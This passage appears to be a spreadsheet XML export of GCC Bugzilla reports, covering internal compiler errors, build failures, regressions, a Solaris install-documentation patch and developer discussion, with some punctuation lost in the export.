/mystic.a/users/botcazou/gcc-head/./gcc/xgcc -B/mystic.a/users/botcazou/gcc-head/./gcc/ -B/work/botcazou/gcc-head/install_ppc/powerpc-linux-gnu/bin/ -B/work/botcazou/gcc-head/install_ppc/powerpc-linux-gnu/lib/ -isystem /work/botcazou/gcc-head/install_ppc/powerpc-linux-gnu/include -isystem /work/botcazou/gcc-head/install_ppc/powerpc-linux-gnu/sys-include    -g -O2 -msoft-float -fPIC -mstrict-align -O2  -g -O2 -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -mlong-double-128 -mno-minimal-toc -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -mlong-double-128 -mno-minimal-toc -I. -I. -I../../.././gcc -I/work/botcazou/gcc-head/src/libgcc -I/work/botcazou/gcc-head/src/libgcc/. -I/work/botcazou/gcc-head/src/libgcc/../gcc -I/work/botcazou/gcc-head/src/libgcc/../include -I/work/botcazou/gcc-head/src/libgcc/../libdecnumber/dpd -I/work/botcazou/gcc-head/src/libgcc/../libdecnumber -DHAVE_CC_TLS  -o _mulsc3.o -MT _mulsc3.o -MD -MP -MF _mulsc3.dep -DL_mulsc3 -c /work/botcazou/gcc-head/src/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
In file included from /work/botcazou/gcc-head/src/libgcc/libgcc2.c:56:0:
/work/botcazou/gcc-head/src/libgcc/libgcc2.c: In function '__mulsc3':
/work/botcazou/gcc-head/src/libgcc/libgcc2.h:256:16: internal compiler error: Segmentation fault
 #define __N(a) __ ## a
                ^
/work/botcazou/gcc-head/src/libgcc/libgcc2.h:350:19: note: in expansion of macro '__N'
 #define __mulsc3  __N(mulsc3)
                   ^~~
/work/botcazou/gcc-head/src/libgcc/libgcc2.c:1900:25: note: in expansion of macro '__mulsc3'
 #define _CONCAT3(ABC) A##B##C
                         ^
/work/botcazou/gcc-head/src/libgcc/libgcc2.c:1899:24: note: in expansion of macro '_CONCAT3'
 #define CONCAT3(ABC) _CONCAT3(ABC)
                        ^~~~~~~~
/work/botcazou/gcc-head/src/libgcc/libgcc2.c:1936:1: note: in expansion of macro 'CONCAT3'
 CONCAT3(__mulMODE3) (MTYPE a MTYPE b MTYPE c MTYPE d)
 ^~~~~~~
0x1085368f crash_signal
        /work/botcazou/gcc-head/src/gcc/toplev.c:338
0x104cf7a8 aggregate_value_p(tree_node const* tree_node const*)
        /work/botcazou/gcc-head/src/gcc/function.c:2019
0x102da197 emit_library_call_value_1
        /work/botcazou/gcc-head/src/gcc/calls.c:4044
0x102db9ab emit_library_call_value(rtx_def* rtx_def* libcall_type machine_mode int ...)
        /work/botcazou/gcc-head/src/gcc/calls.c:4748
0x1045a09f convert_move(rtx_def* rtx_def* int)
        /work/botcazou/gcc-head/src/gcc/expr.c:313
0x1045b0c7 convert_modes(machine_mode machine_mode rtx_def* int)
        /work/botcazou/gcc-head/src/gcc/expr.c:684
0x1070c7db prepare_operand(insn_code rtx_def* int machine_mode machine_mode int)
        /work/botcazou/gcc-head/src/gcc/optabs.c:3955
0x1070cf93 prepare_cmp_insn
        /work/botcazou/gcc-head/src/gcc/optabs.c:3865
0x1070d67f emit_cmp_and_jump_insns(rtx_def* rtx_def* rtx_code rtx_def* machine_mode int rtx_def* int)
        /work/botcazou/gcc-head/src/gcc/optabs.c:4043
0x10397323 do_compare_rtx_and_jump(rtx_def* rtx_def* rtx_code int machine_mode rtx_def* rtx_code_label* rtx_code_label* int)
        /work/botcazou/gcc-head/src/gcc/dojump.c:1144
0x10398257 do_compare_and_jump
        /work/botcazou/gcc-head/src/gcc/dojump.c:1223
0x1039a763 do_jump_1(tree_code tree_node* tree_node* rtx_code_label* rtx_code_label* int)
        /work/botcazou/gcc-head/src/gcc/dojump.c:253
0x1039af23 jumpifnot_1(tree_code tree_node* tree_node* rtx_code_label* int)
        /work/botcazou/gcc-head/src/gcc/dojump.c:140
0x102f90c7 expand_gimple_cond
        /work/botcazou/gcc-head/src/gcc/cfgexpand.c:2489
0x102fa96f expand_gimple_basic_block
        /work/botcazou/gcc-head/src/gcc/cfgexpand.c:5621
0x102ff6ff execute
        /work/botcazou/gcc-head/src/gcc/cfgexpand.c:6367
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[5]: *** [_mulsc3.o] Error 1
Preprocessed testcase attached compile with -msoft-float -mlong-double-128.</t>
  </si>
  <si>
    <t>GCC-45376</t>
  </si>
  <si>
    <t>[4.6 Regression] no such instruction: `pcmpestri $0(%rdi)%xmm0'</t>
  </si>
  <si>
    <t>Updating today at revision 163455 gave : 
/home/mik/gcc46/src/libcpp/lex.c: Assembler messages:
/home/mik/gcc46/src/libcpp/lex.c:448: Error: no such instruction: `pcmpestri $0(%rdi)%xmm0'
/home/mik/gcc46/src/libcpp/lex.c:432: Error: no such instruction: `pcmpestri $0(%rdi)%xmm0'
A revision from yesterday worked (2010-08-21) but I don't remember the revision number. 
Possible culprit according to the ChangeLog : revision 163446.</t>
  </si>
  <si>
    <t>GCC-15626</t>
  </si>
  <si>
    <t>GCC 3.4 emits ld: warning: relocation error: R_SPARC_UA32</t>
  </si>
  <si>
    <t>This is a follow up to GCC bug c++/15599 which was rejected as not a
GCC bug so I'm suggesting a fix to the installation documentation instead.
The problem is that GCC 3.4.0 won't build groff 1.19.1 on Solaris 8 or
9 (or probably Solaris 7 I haven't tried) in 32-bit mode without
generating some Sun linker diagnostics due to the debugging
information being mishandled by the Sun assembler.  I suggest adding a
note about this problem in the installation documentation as follows.
This patch also updates a couple of other obsolete Solaris items.
2004-05-23  Paul Eggert  
	* doc/install.texi (sparc-sun-solaris2*): GCC 3.4 changed the
	default debugging format from STABS to DWARF-2 and this causes
	problems with C++ compiles with -g on 32-bit Solaris 7 and later.
	Mention -gstabs+ as a workaround.
	(sparc-sun-solaris2.7): Update revision info for Sun patch 106950.  
Index: gcc/doc/install.texi
===================================================================
RCS file: /cvsroot/gcc/gcc/gcc/doc/install.texiv
retrieving revision 1.280
diff -p -u -r1.280 install.texi
--- gcc/doc/install.texi	13 May 2004 06:40:25 -0000	1.280
+++ gcc/doc/install.texi	24 May 2004 04:10:53 -0000
@@ -33637 +33637 @@ supported as cross-compilation target on
 @end html
 @c Please use Solaris 2 to refer to all release of Solaris starting
-@c with 2.0 until 2.6 7 and 8.  Solaris 1 was a marketing name for
+@c with 2.0 until 2.6 then 7 8 etc.  Solaris 1 was a marketing name for
 @c SunOS 4 releases which we don't use to avoid confusion.  Solaris
 @c alone is too unspecific and must be avoided.
 @heading @anchor{*-*-solaris2*}*-*-solaris2*
@@ -34726 +347217 @@ and 5.5 (Sun ONE Studio 8) of the Sun co
 failure in form of a miscompilation of the stage1 compiler by the Sun
 compiler.  This is Sun bug 4974440.  This is fixed with patch 112760-07.
+GCC 3.4 changed the default debugging format from STABS to DWARF-2 for
+32-bit code on Solaris 7 and later.  If you are using the Sun
+assembler this change apparently runs afoul of Sun bug 4910101 for
+which (as of 2004-05-23) there is no fix.  A symptom of the problem is
+that you cannot compile C++ programs like @command{groff} 1.19.1
+without getting messages like @samp{ld: warning: relocation error:
+R_SPARC_UA32 @dots{} external symbolic relocation against
+non-allocatable section .debug_info cannot be processed at runtime:
+relocation ignored}.  To work around this problem compile with
+@option{-gstabs+} instead of plain @option{-g}.
+
 @html
 @end html
@@ -35087 +35197 @@ run code generated by GCC it doesn't su
 the hosts that run GCC itself.  Second Sun says that 106950-03 is
 only a partial fix for bug 4210064 but Sun doesn't know whether the
 partial fix is adequate for GCC@.  Revision -08 or later should fix
-the bug.  The current (as of 2001-09-24) revision is -14 and is included in
+the bug.  The current (as of 2004-05-23) revision is -24 and is included in
 the Solaris 7 Recommended Patch Cluster.
 @end itemize</t>
  </si>
  <si>
    <t>GCC-48467</t>
  </si>
  <si>
    <t>[LTO] Anomalous behavior of -save-temps</t>
  </si>
  <si>
    <t>Created attachment 23884
DIFF file with 4 tests
1. After running the 1st test notice the absence of one generated assembler file (1.s) which is deleted by lto1. In toplev.c
1851  if (flag_wpa)
1852    unlink_if_ordinary (asm_file_name)
2. As the 2nd and 3rd tests show it can also be misused as an output file for lto1 so its original written by cc1 content gets lost.
3. The 4th test gives good expected results.</t>
  </si>
  <si>
    <t>GCC-55665</t>
  </si>
  <si>
    <t>[4.8 Regression] Missing DW_TAG_lexical_block PC range</t>
  </si>
  <si>
    <t>This is a regression for GDB gdb.cp/abstract-origin.exp.
PASS: gcc (GCC) 4.7.3 20121212 (prerelease)
FAIL: gcc (GCC) 4.8.0 20121212 (experimental)
(regression sometimes in ~ the last month)
PASS was:
 : Abbrev Number: 14 (DW_TAG_subprogram)
       DW_AT_abstract_origin: 
       DW_AT_linkage_name: (indirect string offset: 0xac): _ZN1AC2Ei
[...]
 : Abbrev Number: 16 (DW_TAG_lexical_block)
       DW_AT_low_pc      : 0x40081e
       DW_AT_high_pc     : 0x400891
 : Abbrev Number: 17 (DW_TAG_variable)
       DW_AT_abstract_origin: 
and above:
 : Abbrev Number: 11 (DW_TAG_lexical_block)
 : Abbrev Number: 12 (DW_TAG_variable)
       DW_AT_name        : (indirect string offset: 0x51): problem
[...]
BTW  was missing DW_AT_abstract_origin  but GDB works with that.
FAIL is:
 : Abbrev Number: 14 (DW_TAG_subprogram)
       DW_AT_abstract_origin: 
       DW_AT_linkage_name: (indirect string offset: 0xa9): _ZN1AC2Ei
[...]
This means GDB correctly inherits the DIE from inherited DIE tree:
 : Abbrev Number: 11 (DW_TAG_lexical_block)
 : Abbrev Number: 12 (DW_TAG_variable)
       DW_AT_name        : (indirect string offset: 0x97): problem
[...]
But that DW_TAG_lexical_block has no DW_AT_low/high_pc (it cannot have as it is not the concrete instance) which is a regression.
GDB currently ignores DW_TAG_lexical_block without DW_AT_low/high_pc/range.
While GDB could recognize DW_TAG_lexical_block without DW_AT_low/high_pc it would be still a debug info quality regression as the GCC-4.7 range there is more narrow than the DW_TAG_subprogram PC range.</t>
  </si>
  <si>
    <t>GCC-81751</t>
  </si>
  <si>
    <t>[5/6/7 Regression]__basic_file::sync() may flush _all_ files</t>
  </si>
  <si>
    <t>When creating a stdio_filebuf from a FILE* the constructor calls __basic_file::sys_open() which in turn calls __basic_file::sync(). Sync() unconditionally makes a call to fflush() even if the _M_cfile member is NULL which then causes _all_ open streams to be sync'd.
This behaviour makes it impossible to use stdio_filebuf in a multithreaded environment as there may be a buffer that is flushed multiple times.
My proposed solution to file libstdc++-v3/config/io/basic_file_stdio.cc is to call fflush() in sync() only if _M_cfile is not NULL:
    int 
    __basic_file::sync() 
    { return _M_cfile ? fflush(_M_cfile) : 0 }
This change makes sure only the controlled sequence is synchronized.
Alternatively the call to sync in function sys_open (in the same file) may be made conditional on _M_cfile.
This issue is present in versions back to at least 4.7.2.</t>
  </si>
  <si>
    <t>bugzilla.volker</t>
  </si>
  <si>
    <t>GCC-609</t>
  </si>
  <si>
    <t>Error messages don't include the source line where the error is caused</t>
  </si>
  <si>
    <t>The code in How-to-repeat
produces the following diagnostics which don't include the place
where the error occured. There are errors recognized in the inner
template stuff of STL but the original place of instantiation
is not mentioned. You have to manually comment out all possible
occurrences of the error to find it in bigger pieces of code.
The diagnostics are:
&gt; make tmple
g++     tmple.cc   -o tmple
/usr/local/lib/gcc-lib/i586-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_tree.h: In method `void _Rb_tree_Select1st &gt;lessallocator &gt;::insert_unique(int int)':
/usr/local/lib/gcc-lib/i586-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_map.h:176:   instantiated from here
/usr/local/lib/gcc-lib/i586-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_tree.h:1014: invalid type argument of `unary *'
make: *** [tmple] Error 1
Release:
2.95.2
Environment:
GNU/Linux distro SuSE6.3 gcc-2.95.2 compiled myself working flawlessly most of the time
How-To-Repeat:
#include 
#include 
int main(void)
{
  std::map imap
  imap.insert(make_pair(23)) // this one is correct
  imap.insert(23) // this one is errorneous
}</t>
  </si>
  <si>
    <t>GCC-10572</t>
  </si>
  <si>
    <t>Re: c+/3708</t>
  </si>
  <si>
    <t xml:space="preserve"> FWIW icc also rejects the code in strict ansi mode. It accepts it 
 otherwise but I don't know which path it is taking.
 W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth              email:            bangerth@ices.utexas.edu
                                www: http://www.ices.utexas.edu/~bangerth/
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-25892</t>
  </si>
  <si>
    <t>-Wpointer-sign creates problems for Emacs</t>
  </si>
  <si>
    <t>The original report from RMS stated:
GCC 4 when compiling Emacs gives annoying warnings about
mismatched signs of pointer target types.  To turn this
off is not trivial since the -Wno-pointer-sign option
itself causes a diagnostic from older GCC versions.
It makes compilation fail.
Evidently changing Emacs is not an acceptable option.
After discussion with the SC and the original contributor
of the -Wpointer-sign patch the SC agreed that
the best solution would be for -Wpointer-sign not to be
enabled by default but only if -Wall or --pedantic is present.
Since the SC promised this fix to RMS it needs to be considered
a release blocker for 4.1.
(I don't know about 4.0.3 probably best to do it there too).</t>
  </si>
  <si>
    <t>GCC-66523</t>
  </si>
  <si>
    <t>the new clang-based assembler in Xcode 7 on 10.11 fails on libobjc/NXConstStr.m</t>
  </si>
  <si>
    <t>Created attachment 35773
proposed fix from Iain Sandoe
The new clang-based assembler in Xcode 7 fails to build libobjc in FSF gcc 5.1 with the following error...
/bin/sh ./libtool  --mode=compile /sw/src/fink.build/gcc5-5.1.0-2/darwin_objdir/./gcc/xgcc -B/sw/src/fink.build/gcc5-5.1.0-2/darwin_objdir/./gcc/ -B/sw/lib/gcc5/x86_64-apple-darwin15.0.0/bin/ -B/sw/lib/gcc5/x86_64-apple-darwin15.0.0/lib/ -isystem /sw/lib/gcc5/x86_64-apple-darwin15.0.0/include -isystem /sw/lib/gcc5/x86_64-apple-darwin15.0.0/sys-include    /sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/NXConstStr.m -c \
	   -I. -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc   -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -DIN_GCC -DIN_TARGET_LIBS -fno-strict-aliasing -fexceptions -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../gcc -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../gcc/config -I../.././gcc -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../libgcc -I../libgcc -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../include  -fgnu-runtime \
	   -o NXConstStr.lo
libtool: compile:  /sw/src/fink.build/gcc5-5.1.0-2/darwin_objdir/./gcc/xgcc -B/sw/src/fink.build/gcc5-5.1.0-2/darwin_objdir/./gcc/ -B/sw/lib/gcc5/x86_64-apple-darwin15.0.0/bin/ -B/sw/lib/gcc5/x86_64-apple-darwin15.0.0/lib/ -isystem /sw/lib/gcc5/x86_64-apple-darwin15.0.0/include -isystem /sw/lib/gcc5/x86_64-apple-darwin15.0.0/sys-include /sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/NXConstStr.m -c -I. -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -DIN_GCC -DIN_TARGET_LIBS -fno-strict-aliasing -fexceptions -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../gcc -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../gcc/config -I../.././gcc -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../libgcc -I../libgcc -I/sw/src/fink.build/gcc5-5.1.0-2/gcc-5.1.0/libobjc/../include -fgnu-runtime  -fno-common -DPIC -o .libs/NXConstStr.o
/var/tmp//ccc9efWx.s:98:17: error: non-local symbol required in directive
        .no_dead_strip L_OBJC_Module
                       ^
make: *** [NXConstStr.lo] Error 1
The proposed patch from Iain Sandoe suppresses this assembler error and allows libobjc to build under the clang-based assembler.</t>
  </si>
  <si>
    <t>GCC-21512</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] build failure on ppc-apple-darwin5.5 in libcpp</t>
  </si>
  <si>
    <t>When compiling libcpp/init.c:
../../gcc/libcpp/init.c:59: parse error before `'
[9 times]
This error happens on:
TRIGRAPH_MAP
  s('=' '#')   s(')' ']')     s('!' '|')
  s('(' '[')   s('\'' '^')    s('&gt;' '}')
  s('/' '\\')  s('&lt;' '{')     s('-' '~')
END
which once preprocessed is:
__extension__ const uchar _cpp_trigraph_map[255  + 1] = {
  [ '=' ] =   '#'      [ ')' ] =   ']'        [ '!' ] =   '|' 
  [ '(' ] =   '['      [ '\'' ] =   '^'       [ '&gt;' ] =   '}' 
  [ '/' ] =   '\\'     [ '&lt;' ] =   '{'        [ '-' ] =   '~' 
}
The following minimal code:
__extension__ const unsigned char _cpp_trigraph_map[255  + 1] = {
  [ '=' ] =   '#'      [ ')' ] =   ']'        [ '!' ] =   '|' 
}
compiles fine on my linux box but gives 3 parse error before `' on ppc-darwin5.5.
A workaround seems to specify -DHAVE_DESIGNATED_INITIALIZERS=0.</t>
  </si>
  <si>
    <t>GCC-38529</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with nested loops</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.3.0 when
compiled with -O3 -march=pentium4 or -O -ftree-vectorize -march=pentium4:
==================================
float a[4]
void foo()
{
  int i j
  for (i = 0 i &lt; 4 ++i)
    for (j = 0 j &lt; 17 ++j)
      a[i] = 0
}
==================================
bug.c: In function 'foo':
bug.c:3: internal compiler error: in vect_get_vec_def_for_operand at tree-vect-transform.c:2000
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-41728</t>
  </si>
  <si>
    <t>[4.5 Regression] error: SSA name in freelist but still referenced</t>
  </si>
  <si>
    <t>I just tried to compile some C++ code
with the gcc 4.5 mainline snapshot 20091015
and the compiler said
In function 'int s244(defs*)':
cq.cc:562:1: error: SSA name in freelist but still referenced
D.9231_46
cc1plus: note: in statement
lrc_55 = D.9231_46 != D.8194_53
cq.cc:562:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed C++ source attached. Flags -O3 -ffast-math required.</t>
  </si>
  <si>
    <t>GCC-9558</t>
  </si>
  <si>
    <t>subclass cannot find parent members without explicit this-&gt; in some cases</t>
  </si>
  <si>
    <t xml:space="preserve">From: Wolfgang Bangerth 
To: Ryan C. Gordon 
Cc: gcc-bugs@gcc.gnu.org 
Subject: Re: c++/9558: subclass cannot find parent members without explicit
 this-&gt; in some cases
Date: Mon 3 Feb 2003 18:21:52 -0600 (CST)
 &gt; If that's how C++ works in the official spec it's not how it works in 
 &gt; real life.
 I think we all understand this but this is just so because compilers 
 previously didn't implement the standard correctly and did not _force_ you 
 to write compliant code. Mark et al dared to do so in the new parser.
 &gt; I've got half a million lines of code in Unreal Tournament 2003 that 
 &gt; this feature breaks which compile fine on everything from CodeWarrior 
 &gt; to Intel's compiler to Visual C to GCC 2.95.3 3.1 and 3.2. I can list 
 &gt; at least five other games I've worked on that this breaks. I do not 
 &gt; control or write this code I just port it.
 gcc 2.95 ... 3.2 accept it but just because they don't implement the 
 standard.
 Intel icc accepts it unless for example you switch on -Xc -ansi. If you 
 do so then it won't accept your code either. AFAIK the same holds for 
 HP's aCC.
 The situation might be worse than you think: if two-stage name lookup is 
 not implemented then you might get wrong results sometimes. So you have 
 to decide whether you implement the standard or the old status quo.
 &gt; Surely there's got to be some consideration for backwards compatibility 
 &gt; if not real world issues?
 I think the answer will be: if you want to use a newer compiler fix your 
 code. I fixed my 250k lines of code which was painful admittedly but I 
 think it's necessary.
 W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth             email:            bangerth@ticam.utexas.edu
                               www: http://www.ticam.utexas.edu/~bangerth/
</t>
  </si>
  <si>
    <t>GCC-6001</t>
  </si>
  <si>
    <t>g++ problems with nested headers from &gt; egcs-2.91.66 until 3.0.0</t>
  </si>
  <si>
    <t>Hi
I found some strange behaviour with some of the g++ versions greater than 2.91 on different platforms with a small C++ code (included)
I investigated a little more and found out that in my opinion the program was badly coded. The header files included each others and also some of the system headers. So I cleaned up all headers so that there are no more
includes in the header files. Collected the used system and program header's and added the std namespace. Wow what a suprise now all gcc versions include 3.0 accepts the code. 
Can you give me some insight's what makes this program so PRBLEMATIC are this ANSI/ISO feature problems ? All compilers that produce errors find them in their own include files which confuses me. I thought that the problems should be located in the original source code. 
GCC 3.0 on Solaris for example:
poohtmp/mak&gt; g++ -Wall -c buffer.cpp
In file included from
/home/mdeil/bin/../include/g++-v3/bits/basic_file.h:250
                 from
/home/mdeil/bin/../include/g++-v3/bits/std_fstream.h:41
                 from
/home/mdeil/bin/../include/g++-v3/backward/fstream.h:32
                 from buffer.h:4
                 from buffer.cpp:25:
 /home/mdeil/bin/../include/g++-v3/sparc-sun-solaris2.7/bits/basic_file_model.h:
In constructor 
`std::__basic_file::__basic_file(std::__c_lock*)':
/home/mdeil/bin/../include/g++-v3/sparc-sun-solaris2.7/bits/basic_file_model.h:39:
parse error before `' token .............
^^^^^^^^^^^^^^^^^^^^^^^^^^^
Here my modification to get the code compile:
buffer.cpp NOW includes:
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include common.h
#include misc.h
#include error.h
#include buffer.h
using namespace std 
What was the problem ? Why are the original include lines wrong ???
buffer.cpp ORIGINAL includes:
#include 
#include 
#include 
#include 
#include common.h 
 ---&gt; #include misc.h (no more includes)
#include buffer.h
 ---&gt; #include 
 ---&gt; #include 
 ---&gt; #include 
 ---&gt; #include misc.h (no more includes)
 ---&gt; #include error.h (no more includes)
Although I seem to have solved the problem I don't understand it ???????
Release:
gcc version 3.0 and other ...
Environment:
SunOS pooh 5.7 Generic_106541-19 sun4u sparc SUNWUltra-4
How-To-Repeat:
simply type
g++ -Wall -ansi buffer.cpp or buffer.cc</t>
  </si>
  <si>
    <t>mdeil</t>
  </si>
  <si>
    <t>GCC-45876</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_gimple failed</t>
  </si>
  <si>
    <t>Created attachment 21950
preprocessed C source
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: i686-pc-linux-gnu
Configured with: ../configure --disable-bootstrap --enable-languages=c++
Thread model: posix
gcc version 4.6.0 20101003 (experimental) [trunk revision 164915] (GCC) 
$ ./xgcc -B. -O1 ~/t.i
/home/ryan/t.i: In function â€˜gcLINKTREE_GenerateStatesâ€™:
/home/ryan/t.i:91:10: warning: excess elements in struct initialiser [enabled by default]
/home/ryan/t.i:91:10: warning: (near initialisation for â€˜codeGenâ€™) [enabled by default]
/home/ryan/t.i: In function â€˜_ProcessSamplerâ€™:
/home/ryan/t.i:46:33: error: type mismatch in binary expression
short int
short unsigned int
gctUINT16
D.2116 = D.2115 + index
/home/ryan/t.i:46:33: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-46620</t>
  </si>
  <si>
    <t>32-bit structures containing bitfields are not copied correctly on -O2  x86 backend</t>
  </si>
  <si>
    <t>Created attachment 22499
Test case exhibiting the error
The attached code contains a copy between two structures containing bitfields.
The x86 code generated on -O2 fails to copy two fields in the structure. It is also very complex trying to break the structure in sets of bitfields and copy them independently.
I have attached an archive containing
- file exhibiting the error (bitfield-error.c)
- main file driving the example
- generated assembly code (gcc -c -O2 bitfield-error.c -S)
To run the code in the attachment
gcc -c -O2 bitfield-error.c
gcc -c -O0 bitfield-error-main.c
gcc -o bitfield-error bitfield-error.o bitfield-error-main.o
./bitfield-error
Result: 0 expected 1
Running at -O0 gives a different answer
gcc -c -O0 bitfield-error.c
gcc -o bitfield-error bitfield-error.o bitfield-error-main.o
./bitfield-error
Result: 1 expected 1
The gcc used is the one from Ubuntu 10.04.1 LTS :
$ gcc --version
gcc (Ubuntu 4.4.3-4ubuntu5) 4.4.3
Copyright (C) 2009 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.4.3-4ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --program-suffix=-4.4 --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-plugin --enable-objc-gc --enable-targets=all --disable-werror --with-arch-32=i486 --with-tune=generic --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5)</t>
  </si>
  <si>
    <t>bogdan.nitulescu</t>
  </si>
  <si>
    <t>GCC-58678</t>
  </si>
  <si>
    <t>[4.9 Regression] pykde4-4.11.2 link error (devirtualization too trigger happy)</t>
  </si>
  <si>
    <t>pykde4-4.11.2 fails to build:
CMakeFiles/python_module_PyKDE4_phonon.dir/sip/phonon/sipphononpart5.cpp.o:sipphononpart5.cpp:function release_Phonon_BackendCapabilities_Notifier: error: undefined reference to 'vtable for Phonon::BackendCapabilities::Notifier'
/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.0/../../../../x86_64-pc-linux-gnu/bin/ld: the vtable symbol may be undefined because the class is missing its key function
CMakeFiles/python_module_PyKDE4_phonon.dir/sip/phonon/sipphononpart5.cpp.o:sipphononpart5.cpp:function Phonon::BackendCapabilities::Notifier::~Notifier(): error: undefined reference to 'vtable for Phonon::BackendCapabilities::Notifier'
/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.0/../../../../x86_64-pc-linux-gnu/bin/ld: the vtable symbol may be undefined because the class is missing its key function
CMakeFiles/python_module_PyKDE4_phonon.dir/sip/phonon/sipphononpart5.cpp.o:sipphononpart5.cpp:function Phonon::BackendCapabilities::Notifier::~Notifier(): error: undefined reference to 'vtable for Phonon::BackendCapabilities::Notifier'
/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.0/../../../../x86_64-pc-linux-gnu/bin/ld: the vtable symbol may be undefined because the class is missing its key function
collect2: error: ld returned 1 exit status
Reduced:
markus@x4 tmp % cat test.ii
class A {
public:
  virtual ~A()
}
class B : A {
  virtual int m_fn1()
}
void fn1() {
  delete reinterpret_cast(1)
}
markus@x4 tmp % g++ -O1 -c test.ii
markus@x4 tmp % nm test.o | c++filt
0000000000000000 T fn1()
markus@x4 tmp % g++ -O2 -c test.ii
markus@x4 tmp % nm test.o | c++filt
0000000000000000 T fn1()
                 U operator delete(void*)
                 U A::~A()
0000000000000000 W B::~B()
0000000000000000 W B::~B()
0000000000000000 W B::~B()
0000000000000000 n B::~B()
                 U vtable for B
markus@x4 tmp % clang++ -O2 -c test.ii
markus@x4 tmp % nm test.o | c++filt
0000000000000000 T fn1()
markus@x4 tmp % 
Started with r202145.</t>
  </si>
  <si>
    <t>GCC-66948</t>
  </si>
  <si>
    <t>[6 Regression] Performance regression in bit manipulation code</t>
  </si>
  <si>
    <t>Created attachment 36017
Testcase
The attached test code requires significantly more CPU time when compiled with current trunk compared to gcc 4.8.4 and the gcc 5 branch.
gcc 4.8.4:
martin@marvin ~/lsnew $ gcc -std=c99 -O3 testcase.c
martin@marvin ~/lsnew $ time ./a.out
real	0m4.039s
user	0m4.041s
sys	0m0.000s
gcc 5 branch:
martin@marvin ~/lsnew $ gcc -std=c99 -O3 testcase.c
martin@marvin ~/lsnew $  time ./a.out
real	0m3.820s
user	0m3.822s
sys	0m0.000s
trunk:
martin@marvin ~/lsnew $  gcc -std=c99 -O3 testcase.c
martin@marvin ~/lsnew $ time ./a.out
real	0m4.492s
user	0m4.493s
sys	0m0.004s</t>
  </si>
  <si>
    <t>GCC-40323</t>
  </si>
  <si>
    <t>[4.5 Regression] compiling just takes forever and doesn't really process</t>
  </si>
  <si>
    <t>This is with GCC trunk rev 148041:
I have a cpp file where g++ just takes forever with 100% CPU usage and constant (low) memory usage. I am waiting now for 20 minutes without any visible progress.
I attached with GDB to the process and this is some of the details I am seeing:
az@gcomputer:~$ gdb /opt/gcc4.4-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/cc1plus 32654
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-linux-gnu...
Really redefine built-in command frame? (y or n) [answered Y input not from terminal]
Really redefine built-in command thread? (y or n) [answered Y input not from terminal]
Really redefine built-in command start? (y or n) [answered Y input not from terminal]
Attaching to program: /opt/gcc4.4-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/cc1plus process 32654
Reading symbols from /usr/lib/libmpfr.so.1...done.
Loaded symbols for /usr/lib/libmpfr.so.1
Reading symbols from /usr/lib/libgmp.so.3...done.
Loaded symbols for /usr/lib/libgmp.so.3
Reading symbols from /lib/libdl.so.2...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
